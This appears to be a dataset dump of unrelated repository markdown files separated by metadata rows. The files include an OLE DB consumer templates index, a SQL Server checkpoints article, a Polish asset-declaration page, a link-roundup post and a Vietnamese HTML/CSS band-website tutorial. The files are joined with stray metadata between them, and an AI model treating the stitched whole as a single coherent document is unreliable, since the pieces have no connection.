--- description: "Learn more about: Working with OLE DB Consumer Templates" title: "Working with OLE DB Consumer Templates" ms.date: "10/24/2018" helpviewer_keywords: ["sample applications [C++], OLE DB Templates", "OLE DB consumer templates, about consumer templates"] ms.assetid: 526aa897-5961-4396-85cb-c84f77113551 --- # Working with OLE DB Consumer Templates The following topics provide some examples of how to use the OLE DB Consumer Templates in common scenarios: - [Simplifying Data Access with Database Attributes](../../data/oledb/simplifying-data-access-with-database-attributes.md) - [Field Status Data Members in Wizard-Generated Accessors](../../data/oledb/field-status-data-members-in-wizard-generated-accessors.md) - [Traversing a Simple Rowset](../../data/oledb/traversing-a-simple-rowset.md) - [Issuing a Parameterized Query](../../data/oledb/issuing-a-parameterized-query.md) - [Fetching Data](../../data/oledb/fetching-data.md) - [Updating Rowsets](../../data/oledb/updating-rowsets.md) - [Using Stored Procedures](../../data/oledb/using-stored-procedures.md) - [Using Accessors](../../data/oledb/using-accessors.md) - [Obtaining Metadata with Schema Rowsets](../../data/oledb/obtaining-metadata-with-schema-rowsets.md) - [Supporting Transactions in OLE DB](../../data/oledb/supporting-transactions-in-ole-db.md) - [Using OLE DB Record Views](../../data/oledb/using-ole-db-record-views.md) - [Using an Existing ADO Recordset](../../data/oledb/using-an-existing-ado-recordset.md) - [Updating a Column When Another Table Contains a Reference to the Row](../../data/oledb/updating-a-column-when-another-table-contains-a-reference-to-the-row.md) - [Using Bookmarks](../../data/oledb/using-bookmarks.md) - [Retrieving a BLOB](../../data/oledb/retrieving-a-blob.md) - [Receiving Notifications](../../data/oledb/receiving-notifications.md) For an example of creating and implementing an OLE DB Consumer, see [Creating a Simple Consumer](../../data/oledb/creating-an-ole-db-consumer.md). You can also find examples of how to use the OLE DB Consumer Templates in the following samples: - [CatDB](https://github.com/Microsoft/VCSamples/tree/master/VC2010Samples/ATL/OLEDB/Consumer) - [DBViewer](https://github.com/Microsoft/VCSamples/tree/master/VC2010Samples/ATL/OLEDB/Consumer) - [MultiRead](https://github.com/Microsoft/VCSamples/tree/master/VC2010Samples/ATL/OLEDB/Consumer) ## See also [OLE DB Consumer Templates](../../data/oledb/ole-db-consumer-templates-cpp.md)
43.947368
162
0.749301
yue_Hant
0.305385
bb1a1b89cf00669b26e1ab40acb9fbcf7089900e
39
md
Markdown
README.md
MoontasirulIslam/Online-Movie-Ticket-Booking-System
518459f742b6a1d38d6ad630d4cb11d275fe2c58
[ "BSD-3-Clause" ]
null
null
null
README.md
MoontasirulIslam/Online-Movie-Ticket-Booking-System
518459f742b6a1d38d6ad630d4cb11d275fe2c58
[ "BSD-3-Clause" ]
null
null
null
README.md
MoontasirulIslam/Online-Movie-Ticket-Booking-System
518459f742b6a1d38d6ad630d4cb11d275fe2c58
[ "BSD-3-Clause" ]
null
null
null
# Online-Movie-Ticket-Booking-System
13
36
0.769231
kor_Hang
0.456456
bb1a6d0413034e69461ebd0f103f36ccb5be6443
1,939
md
Markdown
_posts/2022/2022-05-16-1824.md
CartoDB/rafagas
9a139ea2b4bc20df1e2517e3e9e12424fc544c0b
[ "MIT" ]
null
null
null
_posts/2022/2022-05-16-1824.md
CartoDB/rafagas
9a139ea2b4bc20df1e2517e3e9e12424fc544c0b
[ "MIT" ]
null
null
null
_posts/2022/2022-05-16-1824.md
CartoDB/rafagas
9a139ea2b4bc20df1e2517e3e9e12424fc544c0b
[ "MIT" ]
null
null
null
--- date: 2022-05-16 layout: rafaga rafagas: - desc: '"Lieux" is an unpublished work by Georges Perec that sought to describe a dozen Parisian sites for twelve years and has now been published along with an expanded digital version of the book available for free online' keyw: Paris lang: FR link: http://liminaire.fr/livre-lecture/article/lieux-de-georges-perec microlink: desc: Une palpitation, un mouvement encore immobile, un espace de sursis dans la dissolution. logo: https://logo.clearbit.com/liminaire.fr title: LIMINAIRE - desc: 'Maps in science fiction can perform three functions, both on behalf of the text and the reader: they can have a thematic purpose, they can have a narrative purpose, or they can have a conceptual goal' keyw: scifi link: https://www.jonathancrowe.net/articles/maps-in-science-fiction/ microlink: desc: 'First published in The New York Review of Science Fiction 356 (Feb 2022) Maps are a central part of our experience of the fantasy genre: “No Tour of Fantasyland is complete without one,” …' image: https://www.jonathancrowe.net/wp/wp-content/uploads/2022/03/steerswoman.jpg logo: https://i0.wp.com/www.jonathancrowe.net/wp/wp-content/uploads/2018/09/cropped-profile-640.jpg?fit=192%2C192&ssl=1 title: Maps in Science Fiction - desc: Online materials from the book "Visualization Analysis & Design" by Tamara Munzner, with resources, videos, presentations and links to all the courses made everywhere that take it as a basis keyw: visualization link: https://www.cs.ubc.ca/~tmm/vadbook/ microlink: desc: 'Draft versions of this book were used for test teaching at many institutions between Spring 2014 and Fall 2011:' image: https://www.cs.ubc.ca/~tmm/vadbook/vadcover.med.png logo: https://www.ubc.ca/favicon.ico title: Visualization Analysis and Design via: '@xurxosanz' rid: 1824 ---
46.166667
123
0.736978
eng_Latn
0.920178
bb1aa26fd0520c9bfab8cb07d74d4ca3def66776
394
md
Markdown
_local-declarations/kierownicze_gminy.md
EE/aplikacje-static
ba5b561dc1f6880c0e593d40081e39fe70097a0e
[ "MIT" ]
null
null
null
_local-declarations/kierownicze_gminy.md
EE/aplikacje-static
ba5b561dc1f6880c0e593d40081e39fe70097a0e
[ "MIT" ]
null
null
null
_local-declarations/kierownicze_gminy.md
EE/aplikacje-static
ba5b561dc1f6880c0e593d40081e39fe70097a0e
[ "MIT" ]
null
null
null
--- title: Kierownicze Stanowisko w Gminie category: ['Stanowska Samorządowe'] link: https://aplikacje.gov.pl/oswiadczenia-majatkowe/index.php/418237?lang=pl&encode= more: info --- wójt, zastępca i sekretarz wójta, skarbnik gminy, kierownik jedn. organizacyjnej, osoba zarządzająca i członek organu zarządzającego gminną osobą prawną oraz osoby wydające decyzje administracyjne w imieniu wójta
49.25
212
0.812183
pol_Latn
1.000006
bb1acccd3fad3a41dd8e525376009507253da012
15,813
md
Markdown
docs/relational-databases/logs/database-checkpoints-sql-server.md
mversic/sql-docs
b5189c44af0b43b94137aabbeef8bdc108d197f8
[ "CC-BY-4.0", "MIT" ]
4
2019-03-10T21:54:49.000Z
2022-03-09T09:08:21.000Z
docs/relational-databases/logs/database-checkpoints-sql-server.md
mversic/sql-docs
b5189c44af0b43b94137aabbeef8bdc108d197f8
[ "CC-BY-4.0", "MIT" ]
1
2020-11-09T17:22:05.000Z
2020-11-19T20:51:25.000Z
docs/relational-databases/logs/database-checkpoints-sql-server.md
mversic/sql-docs
b5189c44af0b43b94137aabbeef8bdc108d197f8
[ "CC-BY-4.0", "MIT" ]
1
2021-09-16T15:41:10.000Z
2021-09-16T15:41:10.000Z
--- title: "Database Checkpoints (SQL Server) | Microsoft Docs" description: Learn about checkpoints, known good points from which the SQL Server Database Engine can start applying changes contained in the log during recovery. ms.date: 04/23/2019 ms.prod: sql ms.prod_service: "database-engine, sql-database" ms.reviewer: "" ms.custom: "" ms.technology: supportability ms.topic: conceptual helpviewer_keywords: - "automatic checkpoints" - "transaction logs [SQL Server], checkpoints" - "logs [SQL Server], active" - "pages [SQL Server], dirty" - "MinLSN" - "checkpoints [SQL Server]" - "pages [SQL Server], flushing" - "dirty pages" - "transaction logs [SQL Server], active logs" - "recovery interval option [SQL Server]" - "buffer cache [SQL Server]" - "logs [SQL Server], checkpoints" - "Minimum Recovery LSN" - "flushing pages" - "active logs" ms.assetid: 98a80238-7409-4708-8a7d-5defd9957185 author: "MashaMSFT" ms.author: "mathoma" monikerRange: "=azuresqldb-current||>=sql-server-2016||>=sql-server-linux-2017||=azuresqldb-mi-current" --- # Database Checkpoints (SQL Server) [!INCLUDE [SQL Server Azure SQL Database](../../includes/applies-to-version/sql-asdb.md)] A *checkpoint* creates a known good point from which the [!INCLUDE[ssDEnoversion](../../includes/ssdenoversion-md.md)] can start applying changes contained in the log during recovery after an unexpected shutdown or crash. ## <a name="Overview"></a> Overview For performance reasons, the [!INCLUDE[ssDE](../../includes/ssde-md.md)] performs modifications to database pages in memory-in the buffer cache-and does not write these pages to disk after every change. Rather, the [!INCLUDE[ssDE](../../includes/ssde-md.md)] periodically issues a checkpoint on each database. A *checkpoint* writes the current in-memory modified pages (known as *dirty pages*) and transaction log information from memory to disk and, also records the information in the transaction log. The [!INCLUDE[ssDE](../../includes/ssde-md.md)] supports several types of checkpoints: automatic, indirect, manual, and internal. The following table summarizes the types of **checkpoints:** |Name|[!INCLUDE[tsql](../../includes/tsql-md.md)] Interface|Description| |----------|----------------------------------|-----------------| |Automatic|EXEC sp_configure **'**recovery interval**','**_seconds_**'**|Issued automatically in the background to meet the upper time limit suggested by the **recovery interval** server configuration option. Automatic checkpoints run to completion. Automatic checkpoints are throttled based on the number of outstanding writes and whether the [!INCLUDE[ssDE](../../includes/ssde-md.md)] detects an increase in write latency above 50 milliseconds.<br /><br /> For more information, see [Configure the recovery interval Server Configuration Option](../../database-engine/configure-windows/configure-the-recovery-interval-server-configuration-option.md).| |Indirect|ALTER DATABASE ... SET TARGET_RECOVERY_TIME **=**_target\_recovery\_time_ { SECONDS &#124; MINUTES }|Issued in the background to meet a user-specified target recovery time for a given database. Beginning with [!INCLUDE[ssSQL15_md](../../includes/sssql15-md.md)], the default value is 1 minute. The default is 0 for older versions, which indicates that the database will use automatic checkpoints, whose frequency depends on the recovery interval setting of the server instance.<br /><br /> For more information, see [Change the Target Recovery Time of a Database &#40;SQL Server&#41;](../../relational-databases/logs/change-the-target-recovery-time-of-a-database-sql-server.md).| |Manual|CHECKPOINT [*checkpoint_duration*]|Issued when you execute a [!INCLUDE[tsql](../../includes/tsql-md.md)] CHECKPOINT command. The manual checkpoint occurs in the current database for your connection. By default, manual checkpoints run to completion. Throttling works the same way as for automatic checkpoints. Optionally, the *checkpoint_duration* parameter specifies a requested amount of time, in seconds, for the checkpoint to complete.<br /><br /> For more information, see [CHECKPOINT &#40;Transact-SQL&#41;](../../t-sql/language-elements/checkpoint-transact-sql.md).| |Internal|None.|Issued by various server operations such as backup and database-snapshot creation to guarantee that disk images match the current state of the log.| > [!NOTE] > The **-k** [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] advanced setup option enables a database administrator to throttle checkpoint I/O behavior based on the throughput of the I/O subsystem for some types of checkpoints. The **-k** setup option applies to automatic checkpoints and any otherwise unthrottled manual and internal checkpoints. For automatic, manual, and internal checkpoints, only modifications made after the latest checkpoint need to be rolled forward during database recovery. This reduces the time required to recover a database. > [!IMPORTANT] > Long-running, uncommitted transactions increase recovery time for all checkpoint types. ## <a name="InteractionBwnSettings"></a> Interaction of the TARGET_RECOVERY_TIME and 'recovery interval' Options The following table summarizes the interaction between the server-wide **sp_configure '**recovery interval**'** setting and the database-specific `ALTER DATABASE ... TARGET_RECOVERY_TIME` setting. |TARGET_RECOVERY_TIME|'recovery interval'|Type of Checkpoint Used| |----------------------------|-------------------------|-----------------------------| |0|0|automatic checkpoints whose target recovery interval is 1 minute.| |0|>0|Automatic checkpoints whose target recovery interval is specified by the user-defined setting of the **sp_configure 'recovery interval'** option.| |>0|Not applicable.|Indirect checkpoints whose target recovery time is determined by the TARGET_RECOVERY_TIME setting, expressed in seconds.| ## <a name="AutomaticChkpt"></a> Automatic checkpoints An automatic checkpoint occurs each time the number of log records reaches the number the [!INCLUDE[ssDE](../../includes/ssde-md.md)] estimates it can process during the time specified in the **recovery interval** server configuration option. For more information, see [Configure the recovery interval Server Configuration Option](../../database-engine/configure-windows/configure-the-recovery-interval-server-configuration-option.md). In every database without a user-defined target recovery time, the [!INCLUDE[ssDE](../../includes/ssde-md.md)] generates automatic checkpoints. The frequency depends on the **recovery interval** advanced server configuration option, which specifies the maximum time that a given server instance should use to recover a database during a system restart. The [!INCLUDE[ssDE](../../includes/ssde-md.md)] estimates the maximum number of log records it can process within the recovery interval. When a database using automatic checkpoints reaches this maximum number of log records, the [!INCLUDE[ssDE](../../includes/ssde-md.md)] issues an checkpoint on the database. The time interval between automatic checkpoints can be **highly** variable. A database with a substantial transaction workload will have more frequent checkpoints than a database used primarily for read-only operations. Under the simple recovery model, an automatic checkpoint is also queued if the log becomes 70 percent full. Under the simple recovery model, unless some factor is delaying log truncation, an automatic checkpoint truncates the unused section of the transaction log. By contrast, under the full and bulk-logged recovery models, once a log backup chain has been established, automatic checkpoints do not cause log truncation. For more information, see [The Transaction Log &#40;SQL Server&#41;](../../relational-databases/logs/the-transaction-log-sql-server.md). After a system crash, the length of time required to recover a given database depends largely on the amount of random I/O needed to redo pages that were dirty at the time of the crash. This means that the **recovery interval** setting is unreliable. It cannot determine an accurate recovery duration. Furthermore, when an automatic checkpoint is in progress, the general I/O activity for data increases significantly and quite unpredictably. ### <a name="PerformanceImpact"></a> Impact of recovery interval on recovery performance For an online transaction processing (OLTP) system using short transactions, **recovery interval** is the primary factor determining recovery time. However, the **recovery interval** option does not affect the time required to undo a long-running transaction. Recovery of a database with a long-running transaction can take much longer than the time specified in the **recovery interval** setting. For example, if a long-running transaction took two hours to perform updates before the server instance became disabled, the actual recovery takes considerably longer than the **recovery interval** value to recover the long transaction. For more information about the impact of a long running transaction on recovery time, see [The Transaction Log &#40;SQL Server&#41;](../../relational-databases/logs/the-transaction-log-sql-server.md). For more information about the recovery process, see [Restore and Recovery Overview (SQL Server)](../../relational-databases/backup-restore/restore-and-recovery-overview-sql-server.md#TlogAndRecovery). Typically, the default values provides optimal recovery performance. However, changing the recovery interval might improve performance in the following circumstances: - If recovery routinely takes significantly longer than 1 minute when long-running transactions are not being rolled back. - If you notice that frequent checkpoints are impairing performance on a database. If you decide to increase the **recovery interval** setting, we recommend increasing it gradually by small increments and evaluating the effect of each incremental increase on recovery performance. This approach is important because as the **recovery interval** setting increases, database recovery takes that many times longer to complete. For example, if you change **recovery interval** to 10 minutes, recovery takes approximately 10 times longer to complete than when **recovery interval** is set to 1 minute. ## <a name="IndirectChkpt"></a> Indirect checkpoints Indirect checkpoints, introduced in [!INCLUDE[ssSQL11](../../includes/sssql11-md.md)], provide a configurable database-level alternative to automatic checkpoints. This can be configured by specifying the **target recovery time** database configuration option. For more information, see [Change the Target Recovery Time of a Database &#40;SQL Server&#41;](../../relational-databases/logs/change-the-target-recovery-time-of-a-database-sql-server.md). In the event of a system crash, indirect checkpoints provide potentially faster, more predictable recovery time than automatic checkpoints. Indirect checkpoints offer the following advantages: - An online transactional workload on a database configured for indirect checkpoints can experience performance degradation. Indirect checkpoints ensure that the number of dirty pages are below a certain threshold so the database recovery completes within the target recovery time. The **recovery interval** configuration option uses the number of transactions to determine the recovery time, as opposed to **indirect checkpoints** which makes use of the number of dirty pages. When indirect checkpoints are enabled on a database receiving a large number of DML operations, the background writer can start aggressively flushing dirty buffers to disk to ensure that the time required to perform recovery is within the target recovery time set of the database. This can cause additional I/O activity on certain systems which can contribute to a performance bottleneck if the disk subsystem is operating above or nearing the I/O threshold. - Indirect checkpoints enable you to reliably control database recovery time by factoring in the cost of random I/O during REDO. This enables a server instance to stay within an upper-bound limit on recovery times for a given database (except when a long-running transaction causes excessive UNDO times). - Indirect checkpoints reduce checkpoint-related I/O spiking by continually writing dirty pages to disk in the background. However, an online transactional workload on a database configured for indirect checkpoints can experience performance degradation. This is because the background writer used by indirect checkpoint sometimes increases the total write load for a server instance. > [!IMPORTANT] > Indirect checkpoint is the default behavior for new databases created in [!INCLUDE[ssSQL15](../../includes/sssql15-md.md)], including the Model and TempDB databases. > Databases that were upgraded in-place, or restored from a previous version of [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)], will use the previous automatic checkpoint behavior unless explicitly altered to use indirect checkpoint. ### <a name="ctp23"></a> Improved indirect checkpoint scalability Prior to [!INCLUDE[ssNoVersion](../../includes/sssqlv15-md.md)], you may experience non-yielding scheduler errors when there is a database that generates a large number of dirty pages, such as `tempdb`. [!INCLUDE[sql-server-2019](../../includes/sssqlv15-md.md)] introduces improved scalability for indirect checkpoint, which should help avoid these errors on databases that have a heavy `UPDATE`/`INSERT` workload. ## <a name="EventsCausingChkpt"></a> Internal checkpoints Internal Checkpoints are generated by various server components to guarantee that disk images match the current state of the log. Internal checkpoint are generated in response to the following events: - Database files have been added or removed by using ALTER DATABASE. - A database backup is taken. - A database snapshot is created, whether explicitly or internally for DBCC CHECKDB. - An activity requiring a database shutdown is performed. For example, AUTO_CLOSE is ON and the last user connection to the database is closed, or a database option change is made that requires a restart of the database. - An instance of [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] is stopped by stopping the [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] (MSSQLSERVER) service . Either action causes a checkpoint in each database in the instance of [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)]. - Bringing a [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] failover cluster instance (FCI) offline. ## <a name="RelatedTasks"></a> Related tasks **To change the recovery interval on a server instance** - [Configure the recovery interval Server Configuration Option](../../database-engine/configure-windows/configure-the-recovery-interval-server-configuration-option.md) **To configure indirect checkpoints on a database** - [Change the Target Recovery Time of a Database &#40;SQL Server&#41;](../../relational-databases/logs/change-the-target-recovery-time-of-a-database-sql-server.md) **To issue a manual checkpoint on a database** - [CHECKPOINT &#40;Transact-SQL&#41;](../../t-sql/language-elements/checkpoint-transact-sql.md) ## See also [The Transaction Log &#40;SQL Server&#41;](../../relational-databases/logs/the-transaction-log-sql-server.md) [SQL Server Transaction Log Architecture and Management Guide](../../relational-databases/sql-server-transaction-log-architecture-and-management-guide.md)
111.359155
691
0.767027
eng_Latn
0.987204
bb1addf8810f35c029cd5fa84d522bc03ce4fb06
36,221
md
Markdown
README.md
nmcanhh/W3-Band
2219cbe2701ccc672ddfd189467034dd1c666477
[ "Xnet", "X11" ]
null
null
null
README.md
nmcanhh/W3-Band
2219cbe2701ccc672ddfd189467034dd1c666477
[ "Xnet", "X11" ]
null
null
null
README.md
nmcanhh/W3-Band
2219cbe2701ccc672ddfd189467034dd1c666477
[ "Xnet", "X11" ]
null
null
null
# 1. Header Tạo `index.html`, `assets/css/style.css`, `assets/img` 0) Tạo khung HTML <div id="main"> <div id="header"> <ul id="nav"> <li><a href="">Home</a></li> <li><a href="">Band</a></li> <li><a href="">Tour</a></li> <li><a href="">Contact</a></li> <li> <a href="">More</a> <ul class="subnav"> <li><a href="">Merchandise</a></li> <li><a href="">Extras</a></li> <li><a href="">Media</a></li> </ul> </li> </ul> </div> <div id="slider"> </div> <div id="content"> </div> <div id="footer"> </div> </div> 1) Tạo `Reset CSS` * { padding: 0; margin: 0; box-sizing: border-box; } 2) Tạo CSS cho `#header` #header { height: 46px; background-color: #000; } 3) Tạo CSS cho `#nav li` #nav li { display: inline-block; } Thẻ `li` có thuộc tính mặc định là `display: list-item` nên tất cả content sẽ được xổ dọc xuống, ta có thể đổi thành `inline-block` để nó xổ ngang. `inline` là đứng trên 1 hàng, `block` là giữ lại tính chất khối để đặt được kích thước. 4) Ẩn `subnav` của More đi #nav .subnav { display: none; } 5) Set chữ màu trắng, ẩn đường gạch chân của thẻ `a` #nav li a { color: #fff; text-decoration: none; } 6) Căn giữa chiều cao cho thẻ `#nav li a` #nav li a { line-height: 46px; } Chữ luôn nằm giữa chiều cao của chính nó, ví dụ như thẻ `a` không có kích thước chiều cao bằng với thẻ `div` bao bọc nó thì mình cho `line-height` của thẻ `a` bằng với `chiều cao` của thẻ `div`, khi đó chữ sẽ được căn giữa chiều cao. 7) Tăng độ giãn cách nhau cho thẻ `a` #nav li a { padding: 0 24px; } 8) Đổi font cho toàn bộ trang web html { font-family: Arial, Helvetica, sans-serif; } 9) Thêm hiệu ứng khi rê vào thẻ `a` #nav li:hover a { color: #000; background-color: #ccc; } Theo kinh nghiệm, chúng ta thêm hover cho thẻ `li` chứ không thêm vào thẻ `a`, vẫn có tác dụng như bình thường. 10) Thay đổi kích thước chiều ngang và chiều dọc của thẻ `a`, khi đó hover cũng sẽ full viền. #nav li a { display: inline-block; } Tính chất mặc định của thẻ `a` là inline, không set được kích thước chiều ngang và chiều dọc. Vậy nên ta phải thêm `display: inline-block` để set được chiều ngang và chiều dọc. Sau đó thẻ a sẽ thừa kế thêm `line-height` của nó. 11) Set background tạm thời cho `#slider` để dễ nhìn #slider { min-height: 500px; background-color: #333; } 12) Hiện `subnav` của More #nav .subnav { display: block; } 13) Cho thẻ cha `li` có thuộc tính là `relative` #nav li { position: relative; } 14) Cho thẻ con `ul` có thuộc tính là `absolute` #nav .subnav { position: absolute; } 15) Cho khối `#subnav` có màu trắng #nav .subnav { background-color: #fff; } Lúc này, chứ trong khối `#subnav` cũng màu trắng vì thuộc tính `color: #fff` đã áp dụng lên cho thẻ `a` cấp 1 và cấp 2. 16) Thay đổi phạm vi áp dụng `color: #fff` trực tiếp lên thẻ `a` cấp 1 #nav > li > a { color: #fff; } #nav li a { // color: #fff; (5) } 18) Lúc này chữ của thẻ `a` cấp 2 sẽ thành màu tím, chúng ta cho màu thành `color: #000` #nav .subnav a { color: #000; } 19) Thay đổi phạm vi áp dụng `background-color: #ccc;` khi hover trực tiếp lên thẻ `a` cấp 1 #nav > li:hover > a { background-color: #ccc; } 20) Thêm thuộc tính khi hover thẻ `a` của `#subnav` #nav .subnav li:hover a { color: #000; background-color: #ccc; } 21) Lúc này khi hover vào thẻ a của `#subnav` thì phần hover sẽ không bao hết chiều ngang. Lý do là ở thẻ a cấp 2 (lúc này thuộc tính trong `#nav li a` đã áp dụng lên cho cả thẻ a cấp 1 và cấp 2) đang để là `display: inline-block`,nó sẽ set được chiều ngang và chiều dọc nhưng sẽ không kế thừa được chiều rộng của thẻ chứa nó, tức là thẻ `li`. Ta đổi thành `display: block` để giải quyết vấn đề này. #nav li a { display: block; } 22) Lúc này thuộc tính trong thẻ `#nav li` sẽ áp dụng lên cả thẻ `li` cấp 1 và cấp 2, vô tình, thẻ a cấp 2 sẽ thừa kế chiều rộng được tạo bằng thuộc tính `display: inline-block` của thẻ `li` cấp 2, để thuộc tính này chỉ áp dụng lên thẻ `li` cấp 1, ta thay đổi phạm vi áp dụng thuộc tính trên. #nav li { /* display: inline-block; */ } #nav > li { display: inline-block; } 23) Bỏ thuộc tính dấu chấm của thẻ `ul` cấp 1 và 2 #nav, .subnav { list-style-type: none; } 24) UpperCase thẻ a cấp 1 #nav > li > a { text-transform: uppercase; } 25) Giảm `padding` `left`, `right` của thẻ `a` cấp 2 #nav .subnav a { padding: 0 16px; } 26) Thay đổi `line-height` của thẻ a cấp 2 `#subnav` #nav .subnav a { line-height: 38px; } 27) Ẩn đi nền đen của `#slider` #slider { /* min-height: 500px; background-color: #333; */ } 28) Thêm bóng đổ cho `#subnav` #nav .subnav { box-shadow: 0 0 10px rgba(0, 0, 0, 0.3); } 29) Ẩn đi `#subnav` #nav .subnav { display: none; } 29a) Hover vào thẻ `li` chứa `More` thì hiện thẻ `ul` `#subnav` con của `li` #nav li:hover .subnav { display: block; } 30) Trong một số trường hợp, một số trình duyệt sẽ không hiển thị đúng vị trí của `#subnav`, để giải quyết vấn đề này, chúng ta set vị trí cho `#subnav` luôn, mặc dù `position: absolute` đã giải quyết được vấn đề này. #nav .subnav { top: 100%; left: 0; } Tải Themify Icons tại `https://themify.me/themify-icons`, sau đỏ giải nén và cho thư mục Themify vào `assets/fonts`, nhúng font bằng `<link rel="stylesheet" href="./assets/fonts/themify-icons/themify-icons.css">` 31) Thêm `arrow` icon vào `More` và đặt tên class cho nó là `nav-arrow-down` <a href="">More <i class="nav-arrow-down ti-angle-down"></i> </a> 32) Thay đổi kích thước của `nav-arrow-down` #nav .nav-arrow-down { font-size: 14px; } 33) Thêm Search button <div class="search-btn"> <i class="search-icon ti-search"></i> </div> 34) Thay đổi màu sắc và kích thước của `search-icon` #header .search-icon { color: #fff; font-size: 14px; } 35) Lúc này, thẻ `ul` chứa Navigation sẽ chiếm toàn bộ chiều ngang, chúng ta phải làm cho Navigation có nội dung đến đâu thì có chiều dài đến đấy. Sử dụng `inline-block` cho `#nav` #nav { display: inline-block; } 36) Lúc này, thẻ `div` chứa `search-btn` cũng đang chiếm hết chiều ngang của thẻ cha là `#header`, vì quá dài nên không chui lên được thẻ `#header`. Chúng ta sử dụng `float: right` để kéo thẻ `div` sang bên phải, khi một thẻ div dù có kế thừa chiều ngang thì sử dụng dụng `float` thì sẽ mất tính chất kế thừa chiều ngang. #header .search-btn { float: right; } 37) Căn giữa chiều cao cho `search-icon` bằng cách sử dụng `line-height` #header .search-icon { line-height: 46px; } 38) Căn giữa chiều ngang cho `search-btn` bằng cách sử dụng `padding` #header .search-btn:hover { background-color: #f44336; } 39) Thay style trỏ chuột khi hover #header .search-btn:hover { cursor: pointer; } 40) Tăng chiều cao và set màu cho `#content` #content { height: 1000px; background-color: #ccc; } 41) Bám dính `#header` vào bên trên trình duyệt #header { position: fixed; top: 0; left: 0; right: 0; } với `position: fixed` nổi lên trên, `top: 0` dính sát mép bên trên, `left: 0` dính sát mép bên trái và `right: 0` dính sát mép bên phải. 42) Tăng chiều cao và màu cho `#slider` #slider { height: 400px; background-color: green; } 43) Lúc này, chúng ta select `#slider` thì nó chọn luôn phần của `#header`. Lý do là `#header` sử dụng `position: fixed;`, nó sẽ nổi lên 1 tầng cao hơn và nhường vị trí đấy cho `#slider`, tức là `#header` đang đè lên trên `#slider`. Chúng ta mong muốn là phần `#content` sẽ nằm bên dưới mép của `#slider`. Vậy nên chúng ta sẽ sử dụng `margin-top` bằng với chiều cao của `#header`, tức là `#slider` sẽ bắt đầu từ vị trí `46px` của `#header`. #slider { margin-top: 46px; } 44) Xóa màu và chiều cao của `#slider` #slider { // height: 400px; // background-color: green; } # 2. Slider Cứ có ông này đè lên ông kia thì sử dụng thuộc tính `position`. Thẻ div mặc định là chiếm hết chiều ngang của trình duyệt. Tự lưu hình vào `assets/img/slider` 45) Đặt `#slider` có kích thước chiều cao bằng 50% kích thước chiều ngang. #slider { padding-top: 50%; } Khi giá trị của thuộc tính padding-top là pixel thì không nói, nhưng khi là % thì nó là phần trăm của chiều ngang chính nó. 46) Sử dụng `background-image` cho `#slider`, `background-image` nó sẽ đổ nền ảnh tính từ phần padding. #slider { background: url("/assets/img/slider/slider1.jpeg") top center / cover no-repeat; } với `top` là lấy phần trên, `center` là lấy giữa, `cover` là kiểu kích thước và `no-repeat` là không lặp lại. 47) Thêm `text-content` <div id="slider"> <div class="text-content"> <h2 class="text-heading">New York</h2> <p>The atmosphere in New York is lorem ipsum.</p> </div> </div> 48) Thay đổi màu chữ của `#text-content` #slider .text-content { color: #fff; } 49) Sử dụng `position: relative` cho `#slider` và `position: absolute` cho phần text. Lúc này, phần text sẽ được nổi lên 1 lớp so với `#slider`. #slider { position: relative; } #slider .text-content { position: absolute; } 50) Chỉnh vị trí từ đáy #slider đến text-content #slider .text-content { bottom: 47px; } 51) Căn giữa text-content #slider .text-content { left: 50%; transform: translateX(-50%); text-align: center; } Có thể thay `transform: translateX(-50%)`, `text-align: center` bằng `width: 100%` hoặc thay bằng `left: 0`, `right: 0` 52) Giảm độ giày thẻ `#text-heading` #slider .text-heading { font-weight: 500; } giá trị của `font-weight` giao động từ 100 đến 700 53) Thay đổi cỡ chữ cho `#text-heading` và `#text-description` #slider .text-heading { font-size: 24px; } #slider .text-description { font-size: 15px; } 54) Thay đổi khoảng cách từ `#text-description` lên `#text-heading` #slider .text-description { margin-top: 25px; } 55) Fix lỗi khi lăn chuột xuống dưới thì slider che mất thanh header. #header { z-index: 1; } # 3. About section 56) Xóa đi CSS của `#content` 57) Thêm `#content-section` cho About <!-- About section --> <div class="content-section"> <h2 class="section-heading">THE BAND</h2> <p class="section-sub-heading">We love music</p> <p class="about-text">We have created a fictional band website. Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.</p> </div> </div> 58) Set kích thước cho `.content-section` #content .content-section { width: 800px; } 59) Căn `.content-section` ra giữa website #content .content-section { margin-left: auto; margin-right: auto; } 60) Căn dọc cho `.content-section` #content .content-section { padding: 64px 0; } 61) Căn giữa `.section-heading`, `.section-sub-heading` #content .section-heading { text-align: center; } #content .section-sub-heading { text-align: center; } 62) Thay đổi font-size cho `.section-heading`, `.section-sub-heading` #content .section-heading { font-size: 30px; } #content .section-sub-heading { font-size: 15px; } 63) Làm mỏng font chữ của `.section-heading` #content .section-heading { font-weight: 500; } 64) Làm giãn đều chữ của `.section-heading` #content .section-heading { letter-spacing: 4px; } 65) Thay đổi khoảng cách từ `.section-sub-heading` lên `.section-heading` #content .section-sub-heading { margin-top: 25px; } 66) Thay đổi khoảng cách từ `.about-text` lên `.section-sub-heading` và font-size của `.about-text`. #content .about-text { margin-top: 25px; font-size: 15px; } 67) Set chữ nghiêng cho `.section-sub-heading` #content .section-sub-heading { font-style: italic; } 68) Set chữ mờ cho `.section-sub-heading` #content .section-sub-heading { opacity: 0.6; } 69) Làm phẳng chữ 2 bên cho `.about-text`. #content .about-text { text-align: justify; } 70) Thay đổi khoảng cách giữa 2 dòng của `.about-text`. #content .about-text { line-height: 1.4; } Chiều cao của 1 dòng thì sử dụng `line-height`. Với Tiếng Anh là 1.4 và Tiếng Việt là 1.6 71) Thêm Tour section <!-- Tour section --> <div class="content-section"> <h2 class="section-heading">TOUR DATES</h2> <p class="section-sub-heading">Remember to book your tickets!</p> 